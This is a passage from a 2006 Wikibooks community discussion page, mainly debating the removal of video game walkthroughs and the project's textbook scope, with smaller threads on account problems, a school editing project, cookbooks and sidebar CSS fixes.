- That still seems too long a title. Maybe i'm just being unnecessarily picky, however. I just want something that will be easy to find in the "search box" by newcomers, although maybe this subject doesn't lend itself easily to that. Since this is on the "How-to bookshelf", I'm thinking we can go with the general scheme of things over there and imply the title with How-To: "Get a Job". --Whiteknight(talk)(projects) 16:05, 5 May 2006 (UTC)
- Most titles on Wikibooks are actually short. We have many one-word titles, like Calculus and Feminism. I suggest longer titles. With very long titles, one can attempt shorthand, as in Guide to Unix for "Wikibooks Guide to Unix Computing". --Kernigh 00:31, 6 May 2006 (UTC)
- I generally prefer shorter titles, just because it is easier to do an effective search for a short title than for a long one. For instance, it would be much quicker to search for Unix than for Guide to Unix. That's just me though. I'm leaning towards (How to) Find a Job, because it's on the how-to bookshelf, and many of the titles there imply the "how to". --Whiteknight(talk)(projects) 13:27, 8 May 2006 (UTC)
I think i'm going to just name this one "Find Employment" for now, because I would like to start working on this project more, and i'm impatient. If anybody has a better title for it, feel free to move it. --Whiteknight(talk)(projects) 21:14, 8 May 2006 (UTC)
What do I need to do to be able to hear the sound files here at Wikibooks?
I'm having trouble, since they're in .ogg format :(
Jane kiedis 21:09, 6 May 2006 (UTC) Jane kiedis
- Winamp can play .ogg quite well. Grue 21:34, 6 May 2006 (UTC)
- --Kernigh 03:06, 8 May 2006 (UTC)
Why was Talk:Ada Programming/Contributing deleted?
As you can see, this page was deleted [3] with the sole comment "There is no module". I think this page does not qualify for speedy deletion. It was a page with metainformation about the Ada Programming book, targeted at contributors. I guess it was deleted because there was no corresponding module page, but deletion of useful content without warning is a bit aggressive behaviour. Please, could some administrator undelete it? On the other hand, is there an appropriate space for metainformation about a book? We discussed that topic in Talk:Ada_Programming/Contributors_lounge and then we moved the page, which previously was in the main namespace at Ada Programming/Contributing, to the talk namespace. I didn't feel totally satisfied, but never thought a useful talk page would be deleted only because there was no corresponding content page. ManuelGR 12:12, 7 May 2006 (UTC)
- The book contributors should be able to choose whatever forum they like to discuss the project as a whole. The cookbook uses Talk:Cookbook as a sort of staff lounge, but we also have Cookbook:Policy for defining contributing guidelines. An admin should undelete the page. Kellen T 13:45, 7 May 2006 (UTC)
RFC Jimbo
I have requested Jimbo explain wikimedia's policy with respect to howtos on his WP talk page. Kellen T 23:50, 8 May 2006 (UTC)
- Jimbo has responded. His position is that most of the howtos should go. Kellen T 18:39, 12 May 2006 (UTC)
Recruiting Contributors
I have been working on a very ambitious Wikibook project since October, and have so far attracted two contributors. One of them has disappeared, and I expect the second one to disappear soon because the module for which he has expertise is nearly complete.
I have been trying to attract more contributors from the community at which this work is directed, but so far, I have had little success. So now I have an idea that I'd like to get some feedback on.
I would like to have custom lapel pins made for Wikibook contributors. Contribute to "my" book, and I'll send a free pin. Unfortunately, it looks like the minimum order is 50 or 100, depending on who you go to, and then the price for the whole lot runs between $170 and $250 (US). First, I surely am not going to need anywhere near 50 pins - 5 or 10 is probably more like it. Also, I am unwilling to devote my financial resources to something that has a risky return (pins might not attract contributors).
However, if the pin design were a generic Wikibooks design, then I can imagine that the risk (and cost) could be shared by many Wikibookians. The most promising supplier looks to me like it might be these guys (no minimum order, but the difference between 20 pins and 50 pins is very small). I have no affiliation with them, and found them via Google.
Is anyone interested in something like that? Maybe the Foundation could have a couple hundred of them made and sell them in onesies and twosies for a small profit. Thoughts?
Jim Thomas 00:27, 10 May 2006 (UTC)
- I doubt wikimedia would be up for this, and I don't know that it'd actually encourage people to stick around or even to contribute in the first place, but it might be fun. You're looking at lapel pins, which are quite expensive as they are produced from custom-made dies. If you looked instead at 1-inch buttons (think punk kids), you would find the price to be way more reasonable and maybe even something you might feel comfortable bankrolling for your book in particular. Kellen T 00:32, 10 May 2006 (UTC)
- My target audience is into pin trading, which is why I suggested that. Since we're a scouting-type of an organization, we have uniforms, and the pins go nicely there.
- Wikimedia already has a CafePress store. There's a general Wikimedia button pack, but no Wikibooks one. It wouldn't be particularly difficult to sell a Wikibooks logo-stamped button through CafePress, so I suggest you e-mail wikipedia@cafepress.com if that's what you would like. Don't count on selling quality pins through the foundation however. Hope you find something, ✉haginძazt\c 01:45, 10 May 2006 (UTC)
- Thanks Hagindaz. I sent cafepress an email asking if they'd consider offering lapel pins. We'll see what happens. Jim Thomas 02:08, 10 May 2006 (UTC)
please help
I have been blocked by inshanee on charges that are wholly trumped up and false.
In fact, I am working on the very issue myself; I was blocked for alleged "attacks".
Everything I have said is cogently factual, and thus not an attack, with the single possible exception being a vote I made.
Even there, I could provide logic to show that in fact I am just making a cogent observation.
The truth is that this is a pov warrior event and inshanee is abusing his admin privilege.
I am working on the problem of personal attacks, in fact, and this is one reason why I am being targeted. Inshanee and strotha both like to use sly attacks, and then pounce on you when you defend yourself. My version of reality being the cogent analysis and recognition of this tactic puts them in a hard spot, where they would not be able to use the method if I can get the problem resolved.
what follows is what blocking me kept me from posting in response to the "personal attacks" topic posted on Jimbos talk page.
Prometheuspan 19:37, 10 May 2006 (UTC) Actually, that's a slippery slope, a hyperbole, and it's untrue. Using logic, we can discern between attacks and useful conversation about people. More importantly, right now Wikipedia has become an ad hominem fest. In fact, wikipedia has become extremely abusive, thanks to no clear means to deal with the abusiveness. This is a circular problem, in that people with expertise won't participate if they can tell just by browsing the talk pages that it's psychological mob warfare, defending against the ignorant, to bother to try. For example: I'm not adding any material regarding Psychonautics. I might just be one of the world's foremost experts on the topic, having managed to obtain waking Theta states in both myself and others. The topic is already controversial amongst the well educated. Add to this the inevitable problem of facing down an ignorant mob as soon as you say something the thought police finds dangerous to maintaining ignorance, and you have a formula for abuse. If logic and cogency were the dominant paradigm on Wikipedia, then experts might feel safe to come here and contribute. All of the sciences at advanced levels become politically inconvenient for the dominant religious and political paradigms. Those paradigms can only continue to exist via the vacuum created by intentional ignorance. Ignorance is maintained via anti-intellectual pack psychology. And right now, Wikipedia as a form of government falls easily into the category "pack psychology driven MOB".
THE ONLY way to fix this is to make real changes in policy and methods of enforcement regarding personal attacks. (And other considerations of logic, including straw man arguments and false dilemmas.) Prometheuspan 19:37, 10 May 2006 (UTC)
Now, I am getting really sick of being gamed and played by abusive people here, and my next step is to start taking my complaints to people who will listen. Wikiwatch, for instance, has already featured me.
I am trying to resolve these problems, and these people are being patently abusive.
If these problems can't be resolved, then it seems that i will be forced to leave wikibooks and wikipedia, and to make certain that the world knows that wikipedia is an extremely abusive place.
Prometheuspan 19:37, 10 May 2006 (UTC)
- (Trying to be helpful) I have no idea what you're talking about here. You have given insufficient context. Your formatting is also a serious problem that is inhibiting communication; try to write in paragraphs containing one or more sentences, try not using breaks (instead, use indentation or quoting). Finally, write focused sentences that state the facts, with appropriate references (links) to where these things occured; leave your emotional appeals out of it since they only distract from your point. Kellen T 19:45, 10 May 2006 (UTC)
- I'm trying to figure out exactly what the problem is. you are clearly able to leave a message here, which indicates to me that you are probably not blocked from wikibooks. maybe you should be more specific as to how you are blocked, and how we can help. --Whiteknight(talk) (projects) 19:47, 10 May 2006 (UTC)
- He is apparently talking about being blocked at WP: w:User_talk:Prometheuspan, where he has made a bunch of disruptive edits, especially in AFD. Kellen T 20:02, 10 May 2006 (UTC)
Disruptive edits. The characterization begins. Sorry if I am badly formatted; I lose some amount of my dyslexia compensation when I am po'ed. Those VFDs were mockeries of consensus process. What good is WP:No attacks when the rule is only selectively applied to people rogue admins want to fast track or intimidate into silence? I made cogent and rational additions to 3 vfds, which were all of them started by an ad hominem, and all of which were patently pov warrior gaming of the system. In most cases, I just pointed out factual ad hominems. As votes. Maybe I should have invoked WP:Remove attacks and deleted said votes. Hard to tell what the right move is in such a corrupted double standard system.
In any case, that's not why I am being blocked. I am being blocked for defending myself against attacks, using cogent and factual logic. The double standard here is appalling. Nevermind in any case; apparently the only way to deal with the abusiveness of this system is to go outside of the system and unleash the fury of a Sociologist with depth knowledge of Logic.
Obviously, if after a week and a half of abuse has gone unpunished, and nobody cares about it on admin noticeboards, and there's no method to get abuse dealt with, especially by abusive admins, this is a futile effort also. By all means, just ignore me and dismiss me; it's all anybody's done so far, I have come to expect it. Prometheuspan 21:39, 10 May 2006 (UTC)
Prometheuspan 21:39, 10 May 2006 (UTC)
- Hey man, listen up, your ego is astounding. First off, your not going to get anywhere in this place by getting angry, thats not how wiki works. Secondly, its not a great idea to threaten to leave because nobody cares, there are a thousand people here any of which could take your place. Thirdly, stop ranting about the abusive system because the system owns you, your account, everything you have written here, and they know your IP address. Fourthly i think you just threatened all of us with, and I quote: "Nevermind in any case, apparently the only way to deal with the abusiveness of this system is to go outside of the system and unleash the fury of a Sociologist with depth knowledge of Logic."That is highly abusive of your privilige to write here, so in future please save a couple bytes of hard disk space and submit any complaints like a good wikibookian. Hope you haven't already vandalized the system and your wikibookian soul can still be salvaged! Basejumper123 23:59, 10 May 2006 (UTC)
- Wikibooks is not Wikipedia. Whatever it is you have or haven't done over there it doesn't involve Wikibooks. Please feel free to take your case to Wikipedia:Administrators' noticeboard/Incidents if you haven't already. Thank you. GarrettTalk 04:44, 11 May 2006 (UTC)
Text Wrap
In Wikijunior: Solar System, we're having some trouble with pictures moving text too much, what is the wiki-code for text-wrap? Basejumper123 23:49, 10 May 2006 (UTC)
- Not quite sure what you mean; if you use the right/left/center modifiers on Image, you get text wrap automagically. See w:Wikipedia:Extended_image_syntax. If you're trying to prevent images from descending into other sections you can use <br style="clear:both"/> Kellen T 03:08, 11 May 2006 (UTC)
MSRI video lectures
This might be of interest to people who maintain the mathematics section of wikiversity.
MSRI has a large collection of videolectures here. Download is free, and although I am not sure that they have the right license, the fact that they keep most of their videos on archive.org indicates that the license is free enough.
Please, answer me on my talk page.
Using Wikibooks logo in a link?
I'm trying to set up a link from my website to a wikibook (Stuttering) that doesn't have its own graphic or image. Can I use the Wikibooks logo that appears in the upper left corner of the Main Page? Where can I get this image (or a link to it)? This is for a list of recommended books, and the other books have the cover on the left, and my recommendation on the right. It looks bad to not have some image for the wikibook.--Thomas David Kehoe 17:17, 11 May 2006 (UTC)
- The Wikimedia Foundation has established guidelines for use of their logos. They can be found at foundation:Wikimedia visual identity guidelines. Hope this helps. Gentgeen 19:02, 11 May 2006 (UTC)
- I noticed I didn't answer your question about where the file can be found. It is located on the Wikimedia Commons at Commons:Wikimedia. Gentgeen
How To Build A Pykrete Bong
I would like to suggest that How To Build A Pykrete Bong be deleted as it is innapropriate material for wikibooks —the preceding unsigned comment is by Basejumper123 (talk • contribs)
- no, it was still on the bookshelf —the preceding unsigned comment is by Basejumper123 (talk • contribs)
- The page was already deleted. This was evidenced by the fact that you were the only contributor to the book when you posted the above comment. If it was still on the bookshelf, you could have removed it and that would have been end of story. Also, please sign your comments using four tildes, like so: ~~~~ Kellen T 20:58, 12 May 2006 (UTC)
Introduction to Physical Science
Hi everyone, Im trying to write a simple, 8th grade science text that is an "introduction to physical science". It will try to stick to the following syllabus
- laboratory procedure
- measurement
- calculation
- properties
- basic experimentation
I have already written the first chapter, please help out if you have time, the link is here Introduction_to_Physical_Science thanks,
Basejumper123 00:50, 12 May 2006 (UTC)
Policy review - vote now!
There are a lot of policies that have not been resolved. How about focussing on Wikibooks:No personal attacks this month? Can we wrap-up the vote on this? I would also move for Wikibooks:Ad hoc administration committee to be deleted because it looks like it will never go to a clear majority vote. RobinH 16:05, 12 May 2006 (UTC)
There is no policy governing voting
Perhaps before reviewing any other policies the following proposed policy might be reviewed(!): Wikibooks:General voting rules RobinH 10:18, 13 May 2006 (UTC)
Positive language policies
I've just read a bunch of the policy pages and I find myself agreeing with User:Jguk and User:Zephram Stark that we should be attempting to form policies that are in positive terms and not so legalistic and punitive in nature. Jguk proposed something along the lines of Wikibooks:Always act civilly. Zephram has also pointed to this posting by Jimbo for some other context. Kellen T 17:30, 12 May 2006 (UTC)
- Well, Zephram is an odd case since he was banned multiple times from Wikipedia for disruption, etc. You may want to take this into account as you deal with him in the future. --LV (Dark Mark) 21:25, 12 May 2006 (UTC)
- Point taken, but I still agree with his position. Kellen T 21:29, 12 May 2006 (UTC)
- That's fine. Just letting you know where he's coming from. --LV (Dark Mark) 23:30, 12 May 2006 (UTC)
I support Jguk's intention but am doubtful about his means of achieving it. For instance, suppose a user reverted a policy page that had been moved, after a vote, from "proposed" to "enforced" back to "proposed" without any warning at the staff lounge or elsewhere. Suppose I reverted this reversion of the "Enforced" status to "Proposed". Suppose the user reverted that reversion and I reverted that... How would "be nice" solve the resulting fracas?
I support a minimum of rules, perhaps 3 major rules such as:
These would contain most problems that could arise here when "being nice" has broken down. For instance the reversion problem above would be forestalled by Wikibooks:General voting rules and would fall under Wikibooks:Editing disputes policy if a vote had not been taken. RobinH 10:43, 13 May 2006 (UTC)
- For your revert scenario, common sense prevails, an admin temporarily blocks the provoking user and instructs them to act civily or leave. The net effect is the same, I think. Having a policy doesn't really make people act more or less sensibly. Kellen T 15:21, 13 May 2006 (UTC)
- Firstly, what basis would you use to determine if a "revert war" was indeed taking place? One mans's revert war is another man's innocent correction.
- Secondly your suggestion that they be "blocked from editing the page and forced to discuss the matter" is none other than the Wikibooks:Editing disputes policy.
- Your point also places admins at the top of the control hierarchy, like tribal leaders. But suppose an admin reverted the policy page without any warning and another admin reverted the text to its original form. Who should block the admins when there is no policy? If we go for 100% consensus one or other of the admins can just refuse to agree. At the minimum we would need Wikibooks:General voting rules to resolve the situation. RobinH 09:27, 14 May 2006 (UTC)
- It becomes a revert war when the two people who are reverting do it to the same page multiple times. At that point they can't claim that it's just an "innocent correction" because they're actively engaging each other.
- I think Wikibooks:Editing disputes policy is common sense and if not then it's dictated by the idea of "acting civily"
- Admins are at the top of the control hierarchy. It's a fact of life. If they step out of line, though, then they're stripped of their powers. Admins can block other admins as they see fit.
- You're misunderstanding what consensus means. Consensus decision making is predicated upon several things; that all users are working towards the same mission (to build textbook-ish instructional materials), that all users are acting in good faith, and that all users will work towards compromises when disputes arise. If a user is not working towards our goal, not acting in good faith, or not attempting to find compromises, the community can and should ignore or ban them depending upon the severity. Consensus is about evaluating the positions of users on issues, not counting their votes. If only 1 person in a straw poll is saying no, but they provide no acceptable reason, they get ignored. If they are disruptive, engage in revert wars, employ sockpuppets, etc they get banned. If after all of this, you still have reasonable people acting in good faith who can't agree, then either (a) the issue is dropped since it doesn't have sufficient support (b) (if one group is very large) the motion is passed despite the complaints. In the case of (b) the opposition can learn to live with the decision or decide that due to the decision, WB is not the place for them, or a particular book/article isn't worth the effort for them; that's their decision, and that's okay. This isn't as "easy" as just strict voting, but you end up with more broadly acceptable policies. Kellen T 10:07, 14 May 2006 (UTC)
(Reset indent) Kellen, there are some good points here. Perhaps I should let someone else contribute on the side of voting - is there anyone else out there interested in how Wikibooks operates ???!! I'll come back to this in a week or so - even though this is fascinating and very important I should also be adding to some books! RobinH 10:34, 14 May 2006 (UTC)
I couldn't keep away. Kellen, is your point 4b basically a statement that you agree with some kind of vote? In the example above, suppose a vote had demonstrated consensus according to 4b, would you ban the dissenting user if they reverted the change from "enforced" back to "proposed"? RobinH 12:07, 17 May 2006 (UTC)
- Much of collaborative work is not so much about the changes as the context and social interactions. If the user appears to be acting in good faith in reverting the policy (say, maybe, if there is some serious harm that they claim will come from it) then no, it probably doesn't warrant a ban. If they are just being stubborn and refusing to accept the community's decision, and then they engage in a revert war, they are acting in bad faith and could be banned for being disruptive and not acting civily. Kellen T 14:27, 17 May 2006 (UTC)
- And no, 4b does not mean I agree with some kind of vote. Here is an flowchart I made for consensus decision making. The reality on WB is a bit different (and a bit muddled) due to asynchronous communication.
- People who vote no on something on wikibooks are of two types; stand-asides and blocks. Those who learn to live with the decision, despite the fact that they don't totally agree are implict 'stand asides' in the consensus process. The decision hasn't made them question their fundamental commitment to working on the goal of WB. (Other types of stand asides would be people who abstain or people who just leave a comment) The people who block are those for whom the decision on the proposal is make-or-break. If the community decides to pass the proposal over their objections, they leave. We see this in contributors who just disappear and in contributors who flame out.
- A block in a "real life" organization means you're much more serious about your objection to the point where you are willing to leave the organization if the proposal is passed. Since in these organizations you also have a much more highly developed social environment, this is quite extreme. It obviously doesn't work as well on WB/WP since we have a large and anonymous community with a very low barrier to entry. Kellen T 14:45, 17 May 2006 (UTC)
- Nice flowchart. Voting is introduced in organisations because it is realised that your flowchart is iterative. For example, if a blocker fails to stand aside the decision "shall we override the blocker?" becomes a new proposal, then the decision "shall we override the blocker of the decision to override the blocker" becomes a new proposal. This continues until there are no blockers. However, if blockers at the top level block every other level of the iteration then the only solution is for a gang to form that secretly mounts an attack on the blocker.
- The iterative process is probably a natural way of handling events in an organisation that has no constitution. It is the method used in tribes and gangs. The down-side is that each iteration takes months or years on Wikibooks and this places immense blocking power in the hands of individuals. This blocking may have nothing to do with the decision under consideration - for instance Zephram has voted "no" to several policy proposals in Wikibooks using the same text.
- It is a good flowchart. I disagree with what happens where a member still blocks after his concerns have all been addressed (albeit not to his satisfaction). At that time, we need to decide whether to override the blocker, and it is here that voting becomes useful. Informal voting can be useful to gauge feelings before this time, but the emphasis should be on looking to avoid a formal vote to override a blocker if at all possible, Jguk 17:29, 18 May 2006 (UTC)
- Uh, that's not what it implies at all. Yes, there is a feedback loop, but it's not mechanical. If the person blocks, and the community decides to override their block, the community tries to come to consensus then and there. The blocker isn't able to affect that decision making process by blocking again.
- I agree with you that voting is easier in general and makes it easier to essentially shout down people who disagree with the majority, but I don't think it's the best way to come up with broadly accepted and useful policies. Keep in mind that wikibooks is not a business and time is not of the essence. We don't have to meet quarterly deadlines or make profit margins, and we can take the time to discuss issues rather than counting votes out of convenience. Kellen T 20:35, 18 May 2006 (UTC)
Page Hits
Hey, is there anyway to find out how much traffic a certain wikipage is getting? Thanks in advance. Daniel.Stevens 07:17, 13 May 2006 (UTC)
- You might be interested in the discussion at [Hit counting]. Apparently the Wiki hit counters cannot be used either in Wikimedia projects because the "Squibs" serve most pages. RobinH 15:55, 13 May 2006 (UTC)
- Well here's why it's called that. Kellen T 10:48, 14 May 2006 (UTC)
Rip a karaoke cd on Wikibooks:Votes for undeletion
Please comment there, and not here. --Kernigh 01:43, 15 May 2006 (UTC)
Bookshelf reorganization
Please see Wikibooks_talk:All_bookshelves#Reorganization. This is as important as deciding policies and is key to the future growth of Wikibooks. --haginძaz 00:04, 16 May 2006 (UTC)
Academics, Wikibooks, and Authorship
I am new to Wikibooks but one thing I am curious about: is there a strong incentive besides altruism to submit material? Since advanced textbooks are written almost exclusively by academics it seems like the open model for textbooks could be hampered by the incentive that drives academia: authorship. Most professors write books based on classes that they teach but even if your book gets wide distribution the publisher takes basically all of the profit. Academics are paid in recognition which does not seem to be exceptionally prevelant on wikibooks and probably limits the ultimate usefulness of the site. What are the general thoughts that people have here on incentive for academic submissions? It seems to me that altruism can only go so far but "primary authorship" or "textbook coordinator" status or something like it could significantly boost incentive to turn a lot of these stubs into high quality books.Mpickett 02:39, 17 May 2006 (UTC)
- Besides altruism and it being fun, I don't think there is much of a strong incentive to submit material. That hasn't hampered WP from gaining submissions from highly educated people, though. Kellen T 09:05, 17 May 2006 (UTC)
- Many of the books here have a list of principal contributors on the front page. For instance: Ada Programming#Authors and contributors, Programming:Visual Basic Classic#Authors and Contributors. As long as it doesn't turn into blatant self promotion I don't think anyone here has a problem with works and authors being associated. In fact I think it is quite the opposite, reputation counts here, I want to know who the principal authors and maintainers of a book are. Does anyone have a friend or relative who has a real reputation in the real world who could be persuaded to donate some words? Could someone persuade Richard Dawkins or Donald Knuth to contribute? On second thoughts we'd better leave Knuth alone or he'll never get The Art of Computer Programming finished and that would be a much greater loss. --kwhitefoot 09:22, 18 May 2006 (UTC)
Implementing consensus on Wikibooks:No personal attacks
I have just re-read the Talk page on Wikibooks:No personal attacks. There really is a consensus on this policy. Those who have voted "No" (two qualifying users) have voted "No" because they disagree with the idea of a vote, or of policies in general, not because they oppose Wikibooks:No personal attacks so there is indeed consensus. I propose that Wikibooks:No personal attacks should be moved to enforced status. RobinH 09:29, 17 May 2006 (UTC)
- I think we're still at the stage of "synthesise concerns" per the above flowchart (which looks good to me). The discussion on my concerns has not really moved forward since 27 April. If you'd like to respond to them, then I would be happy to re-engage in the debate. In this regard, I note that others have said that they would only like one behaviour policy, a sentiment that I would agree with. The question then comes down to whether this is it - whether this one needs to be amended before it becomes policy - or whether a different approach entirely is sensible. I have drafted my own discussion draft of what I believe a good approach for a single behaviour policy would look like on Wikibooks:Be nice. Hopefully that can help us (directly or indirectly) proceed towards getting us a single final behaviour policy that we are all happy with, Jguk 17:08, 18 May 2006 (UTC)
- As I pointed out above, the flow chart above would lead to iterations and the possibility of endless blockings by one user. According to the flowchart and discussion, a user who was dedicated to the well-being of the project would stand aside.
- The "No personal attacks" policy has only one real dissenter, yourself, and you are dissenting on grounds other than opposition to the specific policy. "Be nice" seems to be a carte-blanche for administrators to do as they wish. It does not define "nice". For instance, would it be "nice" for an administrator to archive a warning that a policy was about to be made enforced, then changing it unilaterally from enforced to proposed despite a large majority in favour of enforcement and then blocking it endlessly? Is that "nice"? RobinH 17:57, 18 May 2006 (UTC)
- I have no objection to your production of a meta-policy that includes the other policies but until then we should have something in place. You and Zephram are blocking specific policies on the basis of objections either to multiple policies or any policies. These issues should be discussed separately from whether a specific policy should be adopted. The problem with the model of primitive consensus building in the flow chart is that it does not allow timely decision making, one user can derail all decisions endlessly unless the others gang up on them and override them. I hate gangs. RobinH 18:10, 18 May 2006 (UTC)
With respect, I disagree with you here. First, the flowchart suggests all concerns are discussed. It is only once all concerns have been discussed and there remains a blocking member that we need to decide whether to override that block or not. I note above that here, and only here, do I believe that a binding vote is necessary. At present, none of my concerns have been addressed at all. Maybe they can be, perhaps by improving the language of the proposed policy so that we are all happy with it. If that is not possible, then and only then do you need to decide to override me. Since none of us are arguing that personal attacks are acceptable, there is no reason to believe that it should come to this. This is not my view alone, another user has specifically requested that you address my concerns first before trying again to make this policy.
I would also note that other users have expressed support only on the grounds that they would like a behaviour policy set out, and that the wording can be improved later. In terms of whether this is the right behaviour policy for us to have, it is not too different from my view that the current proposal has some flaws, and these should be ironed out before the policy goes live.
Stepping back further, my Wikibooks:Be nice proposal is meant to be a principle-based policy. That is, it sets out the general principle to be applied. This may be where we differ as you seem to prefer a rules-based policy. That is, a policy that sets out precise rules that you either comply with or you don't. Full stop. Black and white. Personally I believe principle-based policies are more flexible and deal with controversial situations better. Plus they are less susceptible to wikilawyering (for instance, in a rules-based policy either you have followed the letter of the law or you haven't, and if you haven't the wikilawyer claims whatever you now do is unreasonable, even though you followed the spirit of the law). The rules-based policy allows for technical offences, and may create loopholes for the abusive editor to exploit. A principle-based policy is not so precise, but generally allows for greater flexibility and for shorter policy (you do not have to list everything that is to be banned). It also can be as strong as a rules-based policy. For example, would you not agree that swearing, excessive and persistent reverting and making legal threats would unambiguously be considered contrary to a general "be nice" principle-based policy, even when "nice" is not defined? Jguk 18:18, 18 May 2006 (UTC)
- You say that "all concerns" should be discussed but the concern you are raising is the general issue of whether or not policies of the current type should be enforced. Your concern is not directed at the specific policy.
- Your "be nice" proposal needs renaming because it sounds sickly. Apart from that it is an approach that will need a lot of discussion and has little chance of being adopted for months or even years. Please allow specific policies to be adopted and then start a debate about "be nice" - or "Wikibooks standards of behaviour" or whatever it becomes called. RobinH 12:18, 19 May 2006 (UTC)
Implementing consensus on Wikibooks:Deletion policy
Wikibooks:Deletion policy has had a Vote that shows complete consensus. I propose that this is moved to an enforced policy. RobinH 09:38, 17 May 2006 (UTC)
- This is merely one of the ways that you need to be bold and simply do it. Mark it as enforced, and if it is questioned, you can point to the vote for confirmation that some significant concensus has gone into the proposed policy. If half this effort went into the policies on gaming guide removal or the "textbook" definition that seems to taken hold by the deletionists here on Wikibooks, I would have been considerably more supportive of their actions. --Rob Horning 11:45, 19 May 2006 (UTC)
Rejection of Wikibooks:Ad hoc administration committee
The number of votes against Wikibooks:Ad hoc administration committee is such that it will never become an enforced policy. I am demoting it to "rejected" (even though I proposed it). RobinH 09:29, 17 May 2006 (UTC)
Rejection of Wikibooks:No legal threats
Again, too many votes against for a consensus to ever be achieved for Wikibooks:No legal threats.
This will reduce the number of proposed policies to 5 if the status of the policies mentioned is changed. RobinH 10:17, 17 May 2006 (UTC)
- Fair enough - but anyone reading this comment without looking at the background to this rejection should bear in mind that none of the objections was saying that we in any way condone the making of legal threats. We don't, and it won't be long before a user is blocked if that user persists in making such threats, Jguk 17:10, 18 May 2006 (UTC) | http://en.wikibooks.org/wiki/Wikibooks:Staff_lounge/Archive_18 | crawl-002 | refinedweb | 15,388 | 68.1 |
grep through code history with Git, Mercurial or SVN

May 22nd, 2012 at 3:51 am
A problem that sometimes comes up with source-controlled code is to find a revision in which some line was deleted, or otherwise modified in a way that blame can’t decipher. In other words, we want to grep over all revisions of some file to know which revisions contain a certain pattern. Note that the goal is not to search in the commit log (which is trivial), but rather in the code itself.
Well, if you’re using Mercurial or Git, you’re lucky because both provide built-in methods for doing this.
With Mercurial, use hg grep.
With Git, you can either use git grep in conjunction with git rev-list, or git log -S (more details in this SO thread).
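The Git side can be sketched end-to-end on a throwaway repository (the file name, commit messages, and the pattern 'needle' are invented for the demo):

```shell
# Build a scratch repo with two revisions of somefile.py
repo=$(mktemp -d) && cd "$repo" && git init -q
echo "alpha" > somefile.py
git add somefile.py && git -c user.name=t -c user.email=t@t commit -qm "v1"
echo "needle" >> somefile.py
git add somefile.py && git -c user.name=t -c user.email=t@t commit -qm "v2"

# git log -S: commits whose diff added or removed the pattern
git log -S 'needle' --format='%s' -- somefile.py       # prints: v2

# git rev-list + git grep: search the file's content at every revision
for rev in $(git rev-list --all -- somefile.py); do
    if git grep -q 'needle' "$rev" -- somefile.py; then
        git log -1 --format='%s: found' "$rev"
    fi
done                                                    # prints: v2: found
```

Note the difference: git log -S only reports commits where the number of matches changed, while the rev-list loop reports every revision whose version of the file contains the pattern.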
What about Subversion, though? SVN, to the best of my knowledge, does not have this functionality built-in. Moreover, SVN’s design makes this task inherently slow because no revisions past the last one are actually kept on your machine (unless the repository is local) and you have to ask the server for each revision. That’s a lot of network traffic.
That said, if you’re willing to tolerate the slowness (and sometimes there’s no choice!), then the following script – svnrevgrep – makes it as simple as with Git or Mercurial:
import re, sys, subprocess

def run_command(cmd):
    """ Run shell command, return its stdout output. """
    return subprocess.check_output(cmd.split(), universal_newlines=True)

def svnrevgrep(filename, s):
    """ Go over all revisions of filename, checking if s can be found in them. """
    log = run_command('svn log ' + filename)
    # Revision lines in 'svn log' output start with e.g. "r1234 | author | ..."
    for ver in re.findall(r'^r\d+', log, flags=re.MULTILINE):
        # 'svn cat -r' wants the bare number, so strip the leading 'r'
        cmd = 'svn cat -r %s %s' % (ver.lstrip('r'), filename)
        contents = run_command(cmd)
        print('%s: %s' % (ver, 'found' if re.search(s, contents) else 'not found'))

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print('Usage: %s <path> <regex>' % sys.argv[0])
    else:
        svnrevgrep(sys.argv[1], sys.argv[2])
It basically goes over all revisions of the file starting with the most recent one and looks for the pattern.
Note that while one could imagine using some kind of binary searching to find the first revision in which the regex appears (or doesn’t), this won’t work in the general case because code sometimes is added, then deleted, then re-added, then deleted again (this happens when refactoring or when reverting problematic commits).
Finally, if you find yourself doing the above frequently for a given repository, you may be better off with:
git svn clone <path>
git grep <...>
May 22nd, 2012 at 18:27
This will fail on filenames with spaces in them. You should pass a list of command line tokens to run_command() directly (e.g. run_command(['svn', 'log', filename])) and drop the split().
Also, be aware that subprocess.check_output() needs Python >= 2.7.
May 23rd, 2012 at 10:32
Chris,
I agree about the spaces. This script is mainly aimed at Linux where spaces in filenames are rare, but as you mentioned it can be easily modified to support filenames with spaces.
November 11th, 2013 at 05:01
unbelievably useful, thanks!
Resolving macros using the API
If you need to process macro expressions inside text values in your custom code, use the MacroResolver.Resolve method. Specify the string where you want to resolve macros as the method's input parameter.
For example:
using CMS.MacroEngine;

...

// Resolves macros in the specified string using a new instance of the global resolver
string resolvedTextGlobal = MacroResolver.Resolve("The current user is: {% CurrentUser.UserName %}");
The method evaluates the macros using a new instance of the global resolver and automatically ensures thread-safe processing.
Macro resolvers are system components that provide the processing of macros. The resolvers are organized in a hierarchy that allows child resolvers to inherit all macro options from the parent. The global resolver is the parent of all other resolvers in the system.
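To illustrate the hierarchy, you can obtain a child resolver and give it values its parent does not have. The following is a hedged sketch — the method names (GetInstance, SetNamedSourceData, ResolveMacros) are taken from Kentico's MacroResolver API, and the custom value name is made up:

```csharp
using CMS.MacroEngine;

...

// Gets a new resolver instance that inherits from the global resolver
MacroResolver resolver = MacroResolver.GetInstance();

// Registers a custom named value, available only to this resolver (and its children)
resolver.SetNamedSourceData("CustomName", "CustomValue");

// Resolves macros using the child resolver
string result = resolver.ResolveMacros("The value is: {% CustomName %}");
```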
Resolving localization macros
If you only need to resolve localization macros in text, call the ResHelper.LocalizeString static method.
using CMS.Helpers;

...

// Resolves localization macros in text
string localizedResult = ResHelper.LocalizeString("{$general.actiondenied$}");
reg expr, extract word from string
Discussion in 'Perl Misc' started by joelix@gmail.com, Oct 7, 2005.
Hi
I am trying to write something that compiles and runs correctly on both Linux and Windows. I am running bash in Ubuntu on Linux, and I try to set environment variables in the makefile just before the compile lines. I then write something in the code like
#include <iostream>

int main()
{
#ifdef UBUNTU
    std::cout << "Ubuntu = true\n";
#else
    std::cout << "Ubuntu = false\n";
#endif
    return 0;
}
No matter what variant of this I try (#if vs. #ifdef, UBUNTU vs. $UBUNTU, setting the environment variable on the command line before the make command, etc.), I always get "Ubuntu = false". Can someone set me straight on how to get this working?
Dave | https://www.daniweb.com/programming/software-development/threads/375872/preprocessor-doesn-t-see-my-environment-variables | CC-MAIN-2018-39 | refinedweb | 111 | 70.33 |
Introduction to Web Application Projects
Microsoft Corporation
April 2006
Applies to:
Visual Studio 2005
Visual Studio .NET 2003
